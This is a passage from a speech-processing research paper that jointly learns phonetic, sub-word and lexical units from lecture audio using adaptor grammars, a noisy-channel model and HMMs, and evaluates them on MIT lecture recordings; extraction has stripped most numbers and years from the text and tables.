( ). there are two main differences between the approaches. first, in chung et al. ( ), word- like units are defined as unique sequences of sub- word-like units, so that any variability in the real- ization of word-parts must be accounted for by the acoustic models. in contrast, we explicitly model phonetic variability at the symbolic level, allowing our system to learn low-level units which tightly predict the acoustic realization of phonemes in par- ticular contexts, while still ignoring this variabil- ity when it is irrelevant to distinguishing lexical items. second, while chung et al. ( ) employ a fixed, two-level representation of linguistic struc- ture, our use of adaptor grammars to model sym- bolic lexicon discovery means that we can easily and flexibly vary our assumptions about the hierarchi- cal makeup of utterances and lexical items. in this paper, we employ a simple adaptor grammar with three-levels of hierarchical constituency (word-like, sub-word-like, and phone-like units) and with right- branching structure; future work could explore more articulated representations along the lines of john- son ( b). model . problem formulation and model overview given a corpus of spoken utterances, our model aims to jointly infer the phone-like, sub-lexical, and lex- ical units in each spoken utterance. to discover these hierarchical linguistic structures directly from acoustic signals, we divide the problem into three sub-tasks: ) phone-like unit discovery, ) variabil- ity modeling, and ) sub-lexical and lexical unit learning. each of the sub-tasks corresponds to cer- tain latent structures embedded in the speech data that our model must identify. here we briefly dis- cuss the three sub-tasks as well as the latent vari- ables associated with each, and provide an overview on the proposed model for each sub-task. figure : (a) an overview of the proposed model for inducing hierarchical linguistic structures directly from acoustic signals. as indicated in the graph, the model leverages partial knowledge learned from each level to drive discovery in the others. (b) an illustration of an input example, xi, and the associated latent structures in the acoustic signals di,ui,oi,~vi,zi. these latent structures can each be discovered by one of the three components of the model as specified by the red horizontal bars between (a) and (b). phone-like unit discovery for this sub-task, the model converts the speech input xi into a sequence of phone-like units (plus), ~vi, which implic- itly determines the phone segmentation, zi, in the speech data as indicated in (iv)-(vi) of fig -(b). we use xi = {xi,t|xi,t ∈ r , ≤ t ≤ ti} to denote the series of mel-frequency cepstral coefficients (mfccs) representing the ith utterance (davis and mermelstein, ), where ti stands for the total number of feature frames in utterance i. each xi contains -dimensional mfccs and their first- and second-order time derivatives at a ms frame rate. each xi is also associated with a binary variable zi,t, indicating whether a plu boundary exists between xi,t and xi,t+ . the feature vectors with zi,t = are highlighted by the dark blue bars in fig. -(vi), which correspond to segment boundaries. each speech segment is labelled with a plu id vi,j,k ∈ l, in which l is a set of integers that rep- resent the plu inventory embedded in the speech corpus. we denote the sequence of plu ids asso- ciated with utterance i using ~vi as shown in fig. - (iv), where ~vi = {vi,j| ≤ j ≤ ji} and vi,j = {vi,j,k|vi,j,k ∈ l, ≤ k ≤ |vi,j|}. the variable ji is defined in the discussion of the second sub-task. as depicted in fig. -(a), we construct an acoustic model to approach this sub-problem. the acoustic model is composed of a set of hidden markov mod- els (hmms), π, that are used to infer and model the plu inventory from the given data. phonological variability modeling in conversa- tional speech, the phonetic realization of a word can easily vary because of phonological and phonetic context, stress pattern, etc. without a mechanism that can map these speech production variations into a unique representation, any model that induces lin- guistic structures based on phonetic input would fail to recognize these pronunciations as instances of the same word type. we exploit a noisy-channel model to address this problem and design three edit opera- tions for the noisy-channel model: substitute, split, and delete. each of the operations takes a plu as an input and is denoted as sub(u), split(u), and del(u) respectively. we assume that for every inferred se- quence of plus ~vi in fig. -(b)-(iv), there is a cor- responding series of plus, ui = {ui,j| ≤ j ≤ ji}, in which the pronunciations for any repeated word in ~vi are identical. the variable ji indicates the length of ui. by passing each ui,j through the noisy- channel model, which stochastically chooses an edit operation oi,j for ui,j, we obtain the noisy phonetic realization vi,j. the relationship among ui, oi, and ~vi is shown in (ii)-(iv) of fig. -(b). for notation simplicity, we let oi,j encode ui,j and vi,j, which means we can read ui,j and vi,j directly from oi,j. we refer to the units that are input to the noisy- channel model ui as “top-layer” plus and the units that are output from the noisy-channel model ~vi as “bottom-layer” plus. we denote vi,j as a vector since if a split operation is cho- sen for ui,j, the noisy-channel model will output two plus. sub-word-like and word-like unit learning with the standardized phone-like representation ui, higher-level linguistic structures can be inferred for each spoken utterance. we employ adaptor gram- mars (ags) (johnson et al., ) to achieve this goal, and use di to denote the parse tree that encodes the hierarchical linguistic structures in fig. -(b)-(i). we bracket sub-word-like (e.g., syllable) and word- like units using [·] and (·), respectively. in summary, our model integrates adaptor gram- mars with a noisy-channel model of phonetic vari- ability and an acoustic model to discover hierarchi- cal linguistic structures directly from acoustic sig- nals. even though we have discussed these sub-tasks in a bottom-up manner, our model provides a joint learning framework, allowing knowledge learned from one sub-task to drive discovery in the others. we now a review the formalization of adaptor gram- mars and define the noisy-channel and acoustic com- ponents of our model. we conclude this section by presenting the generative process implied by the three components of our model. . adaptor grammars adaptor grammars are a non-parametric bayesian extension of probabilistic context-free grammars (pcfgs). a pcfg can be defined as a quintu- ple (n,t,r,s,{~θq}q∈n), which consists of dis- joint finite sets of non-terminal symbols n and ter- minal symbols t , a finite set of production rules r ⊆ {n → (n ∪ t)∗}, a start symbol s ∈ n, and vectors of probabilistic distributions {~θq}q∈n . each ~θq contains the probabilities associated with the rules that have the non-terminal q on their left- hand side. we use θr to indicate the probability of rule r ∈ r. we adopt a bayesian approach and im- pose a dirichlet prior on each ~θq ∼ dir(~αq). let t denote a complete derivation, which repre- sents either a tree that expands from a non-terminal q to its leaves, which contain only terminal symbols, or a tree that is composed of a single terminal sym- bol. we define root(t) as a function that returns the root node of t and denote the k immediate subtrees of the root node as t̂ , · · · , t̂k. the probability distri- bution over t q, the set of trees that have q ∈ n ∪t as the root, is recursively defined as follows. g q pcfg(t) = {∑ r∈rq θr ∏k i= g root(t̂i) pcfg (t̂i) root(t) = q ∈ n root(t) = q ∈ t an adaptor grammar is a sextuple (n,t,r,s,{~θq}q∈n,{y q}q∈n), in which (n,t,r,s,{~θq}q∈n) is a pcfg, and {y q}q∈n is a set of adaptors for the non-terminals. an adaptor y q is a function that maps a base distribution over t q to a distribution over distributions over t q. the distribution gqag(t) for q ∈ n of an ag is a sample from this distribution over distributions. specifically, gqag(t) ∼ y q(hq(t)) hq(t) = ∑ r∈rq θr ∏k i= groot(t̂i)ag (t̂i), where hq(t) denotes the base distribution over t q. in this paper, following johnson et al. ( ), we use adaptors that are based on pitman-yor pro- cesses (pitman and yor, ). for terminal sym- bols q ∈ t , we define gqag(t) = , which is a distribution that puts all its probability mass on the single-node tree labelled q. conceptually, ags can be regarded as pcfgs with memories that cache the complete derivations of adapted non-terminals, al- lowing the ag to choose to either reuse the cached trees or select a production an underlying rule in r to expand each non-terminal. for a more detailed description of ags and their connection to pcfgs, we refer readers to johnson et al. ( ) and chapter of o’donnell ( ). to discover the latent hierarchical linguistic struc- tures in spoken utterances, we employ the following ag to parse each spoken utterance, where we adopt the notations of johnson and goldwater ( b) and use underlines to indicate adapted non-terminals and employ + to abbreviate right-branching recursive rules for non-terminals. the last rule shows that the terminals of this ag are the plu ids, which are represented as ui and depicted as the units in the squares of fig. -(b)-(ii). sentence → word+ word → sub-word+ sub-word → phone+ phone → l for l ∈ l note that the grammar above only makes use of right-branching rules and therefore could be sim- ulated using finite-state infrastructure, rather than the more complex context-free machinery implicit in the adaptor grammars framework. we nevertheless make use of the formalism for two reasons. first, on a theoretical level it provides a uniform framework for expressing many different assumptions about the symbolic component of segmentation models (gold- water et al., ; johnson, b; börschinger and johnson, ; johnson, a; johnson and gold- water, b; johnson and demuth, ). using adaptor grammars to formalize the symbolic compo- nent our our model thus allows direct comparisons to this literature as well as transparent extensions fol- lowing earlier work. second, on a practical level, us- ing the framework allowed us to make use of mark johnson’s efficient implementation of the core adap- tor grammar sampling loop, significantly reducing model development time. . noisy-channel model we formulate the noisy-channel model as a pcfg and encode the substitute, split, and delete opera- tions as grammar rules. in particular, for l ∈ l, l → l′ for l′ ∈ l l → ′ l′ for l′ , l′ ∈ l l → � ( ) where l ∈ l are the start symbols as well as the non- terminals of the pcfg. the terminals of this pcfg are l′ ∈ l, which correspond to bottom-layer plus ~vi that are depicted as units in circles in fig. - (b)-(iv). note that {l} and {l′} are drawn from the same inventory of plus, and the notation is meant to signal that {l′} are the terminal symbols of this grammar. the three sets of rules respectively map to the sub(·), split(·), and del(·) operations; thus, the probability of each edit operation is automatically captured by the corresponding rule probability. note that to simultaneously infer a phonetic inventory of an unknown size and model phonetic variation, we can use the infinite pcfg (liang et al., ) to formulate the noisy-channel model. however, for computational efficiency, in our experiments, we in- fer the size of the plu inventory before training the full model, and impose a dirichlet prior on the rule probability distribution associated with each non- terminal l. we explain how inventory size is deter- mined in sec. . . . acoustic model finally, we assign each discovered plu l ∈ l to an hmm, πl, which is used to model the speech re- alization of each phonetic unit in the feature space. in particular, to capture the temporal dynamics of the features associated with a plu, each hmm con- tains three emission states, which roughly corre- spond to the beginning, middle, and end of a pho- netic unit (jelinek, ). we model the emission distribution of each state by using -dimensional diagonal gaussian mixture models (gmms). the prior distributions embedded in the hmms are the same as those described in (lee and glass, ). . generative process of the proposed model with the adaptor grammar, the noisy-channel model, and the acoustic model defined, we summarize the generative process implied by our model as follows. for the ith utterance in the corpus, our model . generates a parse tree di from gsentenceag (·). . for each leaf node ui,j of di, samples an edit rule oi,j from ~θui,j to convert ui,j to vi,j. . for vi,j,k ∈ vi,j, ≤ k ≤ |vi,j|, generates the speech features using πvi,j,k, which determinis- tically sets the value of zi,t. thus, the latent variables our model defines for each utterance are: di, ui, oi, ~vi, zi, π, {~θq}q∈nag∪nnoisy-channel . in the next section, we de- rive inference methods for all the latent variables except for {~θq}q∈nag∪nnoisy-channel , which we integrate out during the inference process. inference we exploit markov chain monte carlo algorithms to generate samples from the posterior distribution over the latent variables. in particular, we construct three markov chain kernels: ) jointly sampling di, oi, ui, ) generating new samples for ~vi, zi, and ) updating π. here, we give an overview of each of the sampling moves. . sampling di, oi, and implicitly ui we employ the metropolis-hastings (mh) algo- rithm (chib and greenberg, ) to generate sam- ples for di and oi, which implicitly determines ui. given d−i,o−i, the current parses and the current edit operations associated with all the sentences in the corpus except the ith utterance, we can con- struct a proposal distribution for d′i and o ′ i by using the approximating pcfg described in johnson et al. ( ) and the approximated probability of o′i,j in o′i, which is defined in eq. . p(o′i,j|o−i;{~α}q) ≈ c−i(u ′ i,j → v′i,j) + ~α u′i,j u′i,j→v′i,j c−i(u′i,j) + ∑ r∈ru ′ i,j ~α u′i,j r ( ) where q ∈ nnoisy-channel, and c−i(w) denotes the number of times that w is used in the analyses for the corpus, excluding the ith utterance, in which w can be any countable entity such as a rule or a symbol. more specifically, we combine the pcfg that approximates the adaptor grammar with the noisy- channel pcfg whose rules are weighted as in eq. to form a new pcfg g′. the new pcfg g′ is thus a grammar that can be used to parse the terminals ~vi and generate derivations that are rooted at the start symbol of the ag. therefore, we transform the task of sampling d′i and o ′ i to the task of generat- ing a parse for ~vi using g′, which can be efficiently solved by using an variant of the inside algorithm for pcfgs (lari and young, ; johnson et al., ; goodman, ; finkel et al., ). . sampling ~vi and zi given the top-layer plus ui and the speech data xi, sampling the boundary variables zi and the bottom- layer plus ~vi is equivalent to sampling an align- ment between ui and xi. therefore, we use the probabilities defined in eq. and employ the back- ward message-passing and forward-sampling algo- rithm described in lee et al. ( ), designed for aligning a letter sequence and speech signals, to pro- pose samples for ~vi and zi. the proposals are then accepted by using the standard mh criterion. . sampling π given zi and ~vi of each utterance in the corpus, generating new samples for the parameters of each hmm πl for l ∈ l is straightforward. for each plu l, we gather all speech segments that are mapped to we use di and d′i to denote the current and the proposed parses. the same relationship is also defined for oi and o′i. lecture topic duration economics mins speech processing mins clustering mins speaker adaptation mins physics mins linear algebra mins table : a brief summary of the six lectures used for the experiments reported in section . a bottom-layer plu vi,j,k = l. for every segment in this set, we use πl to block-sample the state id and the gmm mixture id for each feature vector. from the state and mixture assignments, we can collect the counts that are needed to update the priors for the transition probability and the emission distribution of each state in πl. new samples for the parameters of πl can thus be yielded from the updated priors. experimental setup . dataset to the best of our knowledge, there are no standard corpora for evaluating models of unsupervised lex- icon discovery. in this paper, we perform experi- ments on the six lecture recordings used in (park and glass, ; zhang and glass, ), a part of the mit lecture corpus (glass et al., ). a brief summary of the six lectures is listed in table . . systems full system we constructed two systems based on the model described in sec. . these systems, fulldp and full , differ only in the size of the plu inventory (k). for fulldp, we set the value of k to be the number of plus discovered for each lec- ture by the dphmm framework presented in (lee and glass, ). these numbers were: economics, ; speech processing, ; clustering, ; speaker adaptation, ; physics, ; and algebra, . for full , we used a fixed number of plus, k = . the acoustic component of the fulldp system was initialized by using the output of the dphmm model for each lecture. specifically, we made use of the hmms, the phone boundaries, and the plu that the dphmm model found as the initial values for π, zi, and ~vi of the fulldp system. after initializa- tion, the training of fulldp proceeds by following the three sampling moves described in sec. . sim- ilarly, we employ a hierarchical hmm (hhmm), which is presented in detail in (lake et al., ), to find the initial values of π, zi, and ~vi for the full system. the adaptor grammar component of all sys- tems was initialized following the “batch initializa- tion” method described in johnson and goldwater ( b) which independently samples an ag analy- sis for each utterance. the lesioned systems that are described in the rest of this section were also initial- ized in the same manner. to reduce the inference load on the hmm, we ex- ploit acoustic cues in the feature space to constrain phonetic boundaries to occur at a subset of all pos- sible locations (lee and glass, ). we follow the pre-segmentation method described in (glass, ) to achieve the goal. empirically, this bound- ary elimination heuristic reduces the computational complexity of the inference algorithm by roughly an order of magnitude on clean speech corpora. no acoustic model we remove the acoustic model from fulldp and full to obtain the -am sys- tems. since the -am systems do not have an acous- tic model, they cannot resegment or relabel the data, which implies that there is no learning of phonetic units in the -am systems, making them similar to symbolic segmentation models that include a noisy channel component (elsner et al., ). by com- paring a -am system to its full counterpart, we can investigate the synergies between phonetic and lexi- cal unit acquisition in the full model. no noisy-channel to evaluate the importance of modeling phonetic variability, we remove the noisy- channel model from the -am systems to form - nc systems. a -nc system can be regarded as a pipeline, whereby utterance phone sequences are discovered first, and latent higher-level linguistic structures are learned in the second step and thus is similar to models such as that of jansen et al. ( ). results and analyses training convergence fig. shows the negative log posterior probability of the sampled parses d and edit operations o for each lecture as a function of iteration generated by the fulldp system. given that each lecture consists of roughly only one hour . . . . x iterations − lo g p (d ,o |x ) economics speech processing clustering speaker adaptation physics algebra figure : the negative log posterior probability of the latent variables d and o as a function of iteration obtained by the fulldp model for each lecture. of speech data, we can see that the model converges fairly quickly within a couple hundreds of iterations. in the this section, we report the performance of each system using the corresponding sample from the th iteration. phoneme segmentation we first evaluate our model on the task of phone segmentation for the six lectures. we use a speech recognizer to produce phone forced alignments for each lecture. the phone segmentation embedded in the forced alignments is then treated as the gold standard to which we com- pare the segmentation our model generates. we fol- low the suggestion of (scharenborg et al., ) and use a -ms tolerance window to compute the f score of all proposed phone segmentations. table presents the f scores achieved by dif- ferent systems. because the -am and -nc systems do not do inference over acoustic segmentations, we compare the phoneme-segmentation performance of each full system to its performance at initialization. recall that the full system is initialized using the output of a hierarchical hmm (hhmm), and the fulldp system is initialized using dphmm. from table we can see that the two -am sys- tems achieve roughly the same segmentation perfor- mance for the first four lectures. aside from using the boundary elimination method described in (lee and glass, ), these two systems are trained in- dependently. the table shows that the two initializa- tion systems achieve roughly the same segmentation lecture topic full hhmm fulldp dphmm economics . . . . signal processing . . . . clustering . . . . speaker adaptation . . . . physics . . . . linear algebra . . . . table : the f scores for the phone segmentation task obtained by the full systems and their corresponding initialization systems. lecture topic full -am -nc fulldp -am -nc economics . . . . . . signal processing . . . . . . clustering . . . . . . speaker adaptation . . . . . . physics . . . . . . linear algebra . . . . . . table : f scores for word segmentation obtained by the full systems and their ablated systems. performance for the first four lectures. thus, their narrow performance gap indicates that the two ini- tialization systems may have already found a near- optimal segmentation. since our model also looks for the best segmenta- tion in the same hypothesis space, by initializing the boundary variables around the optimum, our model should simply maintain the segmentation. in par- ticular, as shown in table , the full systems also achieve about the same performance as the -am systems for the first four lectures, with the overall largest performance difference being . %. it is perhaps more interesting when the initializa- tion system gets stuck at a local optimum. by com- paring the performance of the two -am systems for the last two lectures, we can see that the initial- ization of full converges to local optimums for the two lectures. nonetheless, as shown in table , the full system is able to improve the given ini- tial segmentation and reach a similar performance to that accomplished by the fulldp and the initial- ization of the fulldp systems. word segmentation in addition to phone segmen- tation, we also evaluate our model on the task of word segmentation. similar to how we generate the gold standard segmentation for the previous task, we use a speech recognizer to produce word alignments and obtain the word segmentation for each lecture. we then compare the word segmentation that our systems generate to the gold standard and calculate the f scores by using a -ms tolerance window. by comparing the full systems to their -nc coun- terparts, we can see that the noisy-channel model plays an important role for word segmentation, which resonates with the findings of in (elsner et al., ). without the capability of modeling phonetic variability, it is difficult, or even impossible, for the -nc systems to recognize word tokens of the same type but with different phonetic realizations. we can also observe the advantage of joint learn- ing both word-level and phone-level representations by comparing the fulldp system to the correspond- ing -am model. on average, the fulldp system out- performs its -am ablated counterpart by . % on the word segmentation task, which indicates that the top-down word-level information can help refine the phone-level knowledge that the model has learned. while similar improvements are only observed in two lectures for the full and its -am version, we believe it’s because the full system does not have as much flexibility to infer the phonetic embeddings as the fulldp system. this inflexibility may have lecture topic full -am -nc fulldp -am -nc p&g zhang economics signal processing clustering speaker adaptation physics linear algebra table : the number of the target words discovered by each system described in sec. , and by the baseline (park and glass, ), and state-of-the-art system (zhang, ). the best performance achieved for each lecture is shown in bold. prevented the full system to fully exploit the top- down information for learning. finally, note that even though the f scores for the word segmentation task are low, we find simi- lar performance reported in jansen et al. ( ). we would like to raise the question of whether the con- ventional word segmentation task is a proper eval- uation method for an unsupervised model such as the one described in this paper. our thought is two fold. first, correct segmentation is vaguely de- fined. by choosing different tolerance windows, dif- ferent segmentation performance is obtained. sec- ond, as we show later, many of the units discov- ered by our model are linguistically meaningful, al- though they do not always strictly correspond to words (i.e., the units may be morphemes or collo- cations, etc.). since these are linguistically mean- ingful units which should be identified by an unsu- pervised lexical discovery model, it is not clear what advantage would be gained by privileging words in the evaluation. nevertheless, we present the word segmentation performance achieved by our model in this paper for future references. coverage of words with high tfidf scores to assess the performance of our model, we evaluate the degree to which it was able to correctly recover the vocabulary used in input corpora. to facilitate comparison with the baseline (park and glass, ) and state-of-the-art (zhang, ) spoken term dis- covery systems, we restrict attention to the top highest tfidf scoring words for each lecture. note that the set of target words of each lecture were orig- inally chosen in (park and glass, ) and used as the evaluation set in both park and glass ( ) and zhang ( ). to compare our system directly to previous work, we use the same set of target words to test our model. table summarizes the coverage achieved by each variant of our model as well as the two spo- ken term discovery systems. note that these two systems differ only in the acoustic features used to represent the input: mfcc features versus more ro- bust gaussian posteriorgrams, respectively. both the fulldp and full systems consistently outperform the baseline. both systems also exceed or perform as well as the state-of-the-art system on most lectures. furthermore, they do so using the less robust mfcc feature-based acoustic representation. the results in table also illustrate the syner- gistic interactions that occur between the acoustic and symbolic model components. as described in sec. , the -am systems are identical to the full systems, except they do not include the acoustic model, and, therefore, do not re-segment or relabel the speech after initialization. as table shows, the full and fulldp models both tend to have coverage which is as good as, or better than, the corresponding models without an acoustic compo- nent. this indicates that top-down pressure from the symbolic component can refine bottom-layer plus, leading, ultimately, to better lexicon discovery. finally, the comparison between full/-am mod- els and their -nc components suggests the impor- tance of modeling variability in the realization of phonemes. as we will discuss in the next section, the full model tends to merge multiple sequences of for the procedure used to identify the word label for each lexical unit, we refer the reader to sec. . . of (lee, ) for detailed explanation. figure : the bottom-layer plus ~v and the top-layer plus u as well as the word-internal structure that the fulldp system discovered for three instances of the words (a) globalization and (b) collaboration. we also include phoneme transcriptions (derived by manual inspection of spectrograms), for clarity. bottom-layer plus into single lexical items which share a single top-layer plu sequence. the results in table confirm this: when the model does not have the option of collapsing bottom-layer plu se- quences, word discovery degrades considerably. examples and qualitative analyses to provide intuition about the model behavior, we present sev- eral examples and qualitative analyses. figure illustrates the model’s representation of two words which appeared frequently in the economics lecture: globalization and collaboration. the figure shows (i) the bottom-layer plus which the model assigned to three instances of each word in the training cor- pus, (ii) the alignments between these bottom-layer plus and the top-layer plu sequence correspond- ing the model’s lexical representation of each word, (iii) the decomposition of each word-like unit into sub-word-like units, which are denoted as bracketed sequences of plus (e.g., [ ]), and (iv) a hand annotated phonemic transcription. the first thing to note is the importance of the noisy-channel component in normalizing variation across word tokens. in figure -(a) the model has in- ferred a different sequence of bottom-layer plus for each spoken instance of globalization. plus which vary between the three instances are highlighted in red. the model was able to map these units to the single sequence of top-layer plus associated with the lexical item. similar remarks hold for the word collaboration in figure -(b). this suggests that acoustic variability between segments led the model to infer different bottom-layer plus between word tokens, but this variability was correctly normalized by the noisy-channel component. the second thing to note is the large amount of variability in the granularity of stored sub-word-like units (bracketed plu sequences). the model allows sub-word-like units to consist of any sequence of plus, without further constraint. figure shows that the model makes use of the flexibility, repre- senting linguistic structure at a variety of different scales. for example, the initial sub-word-like unit of collaboration groups together two plus corre- sponding to a single phoneme /k/. other sub-word- like units correspond to syllables. still others cap- ture morphological structure. for example, the fi- nal sub-word-like unit in both words (highlighted in green) corresponds to the combination of suf- fixes -ation—a highly productive unit in english (o’donnell, ). the reader may notice that the lexical representations are missing a final /n/ phoneme. manual examination of spectro- transcription discovered lexical units |word| /iy l iy/ (really, willy, billion) [ ] [ ] /ey sh ax n/ (innovation, imagination) [ ] [ ] /ax bcl ax l/ (able, cable, incredible) [ ] [ ] discovered [ ] [ ] [ ] [ ] individual [ ] [ ] [ ] [ ] [ ] powerful [ ] [ ] [ ] open university [ ] [ ] [ ] [ ] [ ] the arab muslim world [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] table : a subset of the lexical units that the fulldp system discovers for the economics lecture. the number of independent speech segments that are associated with each lexical unit is denoted as |word|. lexical units also exhibit variability in granular- ity. table shows a subset of lexical units discov- ered by the fulldp system for the economics lecture. each entry in the table shows (i) the decomposition of each word-like unit into sub-word-like units, (ii) a phonemic transcription of the unit, and (iii) the num- ber of times each lexical unit was used to label a seg- ment of speech in the lecture (denoted as |word|). the lexical units displayed in the table correspond, for the most part, to linguistic units. while there are a few cases, such as /iy l iy/, where the model stored a sequence of phones which does not map directly onto a linguistic unit such as a syllable, morpheme, or word, most stored units do correspond to intu- itively plausible linguistic constituents. however, like sub-word-like units, there is vari- ability in the scale of the linguistic structure which they capture. on one hand, the model stores a number of highly reusable smaller-than-word units, which typically correspond to morphemes or highly frequent syllables. for example, the sequences /ax bcl ax l/ and /ey sh ax n/ correspond to the pro- ductive suffix -able and suffix combination -ation (o’donnell, ). on the other hand, the model also stores lexical units which correspond to words (e.g., powerful) and multi-word collocations (e.g., the arab muslim world). figure shows an analy- sis of stored lexical units for each lecture, plotting grams revealed two likely reasons for this. first, the final plu is likely to be a nasalized variant of /@/, thus encoding some portion of the following /n/ phoneme. second, across these word instances there is a great deal of acoustic variation be- tween the acoustic realizations of the consonant /n/. it is un- clear at present whether this variation is systematic (e.g., co- articulation with the following word), or simply noise. . % . % . % . % . % . % . % . % . % % . % . % . % . % . % . % . % . % economics signal processing clustering speaker adaptation physics linear algebra multi-word single word sub-word figure : the proportions of the word tokens the fulldp system generates for each lecture that map to sub-words, single words, and multi-words. the proportion of stored items which map onto sub- words, words, and multi-word collocations for each. why does the model choose to store some units and not others? like many approaches to lexi- con learning (goldwater, ; de marcken, c; johnson et al., ), our model can be understood as balancing a tradeoff between productivity (i.e., computation) and reuse (i.e., storage). the model attempts to find a set of lexical units which explain the distribution of forms in the input, subject to two opposing simplicity biases. the first favors smaller numbers of stored units. the second favors deriva- tions of observed utterances which use fewer com- putational steps (i.e., using small number of lexical items). these are opposing biases. storing larger lexical units, like the arab muslim world, leads to simpler derivations of individual utterances, but a larger lexicon. storing smaller lexical units, like the suffix -able, leads to a more compact lexicon, but more complex derivations individual utterances. smaller units are favored when they are used across a large variety of relatively infrequent con- texts. for example, -ation appears in a large number of input utterances, but often as part of words which themselves are relatively infrequent (e.g., conversa- tion, reservation, innovation, and foundation which appear , , , and times respectively). larger units will be favored when a combination of smaller units appears more frequently than would be pre- dicted by considering their probabilities in isolation. for example, the model stores the words globaliza- tion and collaboration in their entirety, despite also storing the suffix combination -ation. these words occur and times respectively in the lecture, which is a greater number of times than would be expected merely by considering the words sub-parts. thus, the fact that the model stores a variety of lexi- cal units at different granularities is expected. conclusion and future work in this paper, we have presented a probabilistic framework for inferring hierarchical linguistic struc- tures from acoustic signals. our approach is for- mulated as an integration of adaptor grammars, a noisy-channel model, and an acoustic model. com- parison of the model with lesioned counterparts sug- gested that our model takes advantage of synergis- tic interactions between phonetic and lexical repre- sentations. the experimental results also indicate that modeling phonetic variability may play a crit- ical role in inferring lexical units from speech. while the noisy-channel model has demonstrated an ability to normalize phonetic variations, it has its limitations. in the future, we plan to investi- gate alternatives that more accurately capture pho- netic variation. we also plan to explore grammars that encode other types of linguistic structures such as collocation of lexical and morphological units. acknowledgements the authors would like to thank the anonymous re- viewers and the action editor of this paper, eric fosler-lussier, for helpful comments. furthermore, the authors would also like to thank mark johnson for making his implementation of adaptor grammars publicly available and for answering detailed ques- tions about the model and his implementation. references guillaume aimetti. . modelling early language ac- quisition skills: towards a general statistical learning mechanism. in proceedings of eacl: student re- search workshop, pages – . shlomo argamon, navot akiva, amihood amir, and oren kapah. . efficient unsupervised recursive word segmentation using minimum description length. in proceedings of the th international conference on computational linguistics. m bacchiani and m ostendorf. . joint lexicon, acoustic unit inventory and model design. speech communication, ( ): – . benjamin börschinger and mark johnson. . explor- ing the role of stress in bayesian word segmentation using adaptor grammars. transactions of acl, : – . michael r. brent. a. an efficient, probabilistically sound algorithm for segmentation and word discovery. machine learning, : – . michael r. brent. b. speech segmentation and word discovery: a computational perspective. trends in cognitive sciences, ( ): – , august. timothy a. cartwright and michael r. brent. . segmenting speech without a lexicon: evidence for a bootstrapping model of lexical acquisition. in pro- ceedings of the th annual meeting of the cognitive science society. siddhartha chib and edward greenberg. . un- derstanding the metropolis-hastings algorithm. the american statistician, ( ): – . cheng-tao chung, chun-an chan, and lin-shan lee. . unsupervised discovery of linguistic structure including two-level acoustic patterns using three cas- caded stages of iterative optimization. in proceedings of icassp, pages – . mathias creutz and krista lagus. . unsupervised models for morpheme segmentation and morphology learning. acm transactions on speech and language processing, ( ). steven b. davis and paul mermelstein. . com- parison of parametric representations for monosyllabic word recognition in continuously spoken sentences. ieee transactions on acoustics, speech, and signal processing, ( ): – . carl de marcken. a. linguistic structure as com- position and perturbation. in proceedings of the th annual meeting on association for computational lin- guistics, pages – . association for computa- tional linguistics. carl de marcken. b. the unsupervised acquisition of a lexicon from continuous speech. technical report ai-memo- , cbcl-memo- , massachusetts in- stitute of technology artificial intelligence labora- tory. carl de marcken. c. unsupervised language ac- quisition. ph.d. thesis, massachusetts institute of technology. micha elsner, sharon goldwater, naomi feldman, and frank wood. . a joint learning model of word segmentation, lexical acquisition, and phonetic vari- ability. in proceedings of emnlp, pages – . t.s. ferguson. . a bayesian analysis of some non- parametric problems. ann. statist, ( ): – . jenny rose finkel, christopher d. manning, and an- drew y. ng. . solving the problem of cascading errors: approximate bayesian inference for linguistic annotation pipelines. in proceedings of the confer- ence on empirical methods in natural language pro- cessing (emnlp), pages – . michael c. frank, sharon goldwater, thomas l. grif- fiths, and joshua b. tenenbaum. . modeling human performance in statistical word segmentation. cognition, ( ): – . michael c. frank, joshua b. tenenbaum, and edward gibson. . learning and long-term retention of large-scale artificial languages. public library of sci- ence (plos) one, ( ). james glass, timothy j. hazen, lee hetherington, and chao wang. . analysis and processing of lecture audio data: preliminary investigations. in proceedings of the workshop on interdisciplinary approaches to speech indexing and retrieval at hlt-naacl, pages – . james glass. . a probabilistic framework for segment-based speech recognition. computer speech and language, : – . john goldsmith. . unsupervised learning of the morphology of natural language. computational lin- guistics, ( ): – . john goldsmith. . an algorithm for the unsuper- vised learning of morphology. natural language en- gineering, ( ): – . sharon goldwater, thomas l. griffiths, and mark john- son. . a bayesian framework for word segmen- tation: exploring the effects of context. cognition, : – . sharon goldwater. . nonparametric bayesian mod- els of lexical acquisition. ph.d. thesis, brown uni- versity. joshua t. goodman. . parsing inside-out. ph.d. thesis, harvard university. zellig harris. . from phoneme to morpheme. lan- guage, ( ): – . jahn heymann, oliver walter, reinhold haeb-umbach, and bhiksha raj. . unsupervised word seg- mentation from noisy input. in proceedings of asru, pages – . ieee. aren jansen, kenneth church, and hynek hermansky. . towards spoken term discovery at scale with zero resources. in proceedings of interspeech, pages – . aren jansen, emmanuel dupoux, sharon goldwater, mark johnson, sanjeev khudanpur, kenneth church, naomi feldman, hynek hermansky, florian metze, richard c. rose, et al. . a summary of the jhu clsp workshop on zero resource speech tech- nologies and models of early language acquisition. in icassp, pages – . frederick jelinek. . continuous speech recogni- tion by statistical methods. proceedings of the ieee, : – . mark johnson and katherine demuth. . unsu- pervised phonemic chinese word segmentation using adaptor grammars. in proceedings of coling, pages – , august. mark johnson and sharon goldwater. a. improving nonparameteric bayesian inference: experiments on unsupervised word segmentation with adaptor gram- mars. in human language technologies: the annual conference of the north american chapter of the acl, pages – . mark johnson and sharon goldwater. b. improving nonparameteric bayesian inference: experiments on unsupervised word segmentation with adaptor gram- mars. in proceedings of naacl-hlt, pages – . mark johnson, thomas l. griffiths, and sharon goldwa- ter. . adaptor grammars: a framework for speci- fying compositional nonparametric bayesian models. in advances in neural information processing sys- tems, pages – . mark johnson, thomas l. griffiths, and sharon goldwa- ter. . bayesian inference for pcfgs via markov chain monte carlo. in proceedings of naacl, pages – . mark johnson. a. unsupervised word segmentation for sesotho using adaptor grammars. in proceedings of the tenth meeting of acl special interest group on computational morphology and phonology, pages – , columbus, ohio, june. mark johnson. b. using adaptor grammars to iden- tify synergies in the unsupervised acquisition of lin- guistic structure. in proceedings of acl, pages – . brenden m. lake, chia-ying lee, james r. glass, and joshua b. tenenbaum. . one-shot learning of generative speech concepts. in proceedings of the th annual meeting of the cognitive science soceity. karim lari and steve j. young. . the estimation of stochastic context-free grammars using the inside- outside algorithm. computer speech & language, ( ): – . chia-ying lee and james glass. . a nonparamet- ric bayesian approach to acoustic model discovery. in proceedings of acl, pages – . chia-ying lee, yu zhang, and james glass. . joint learning of 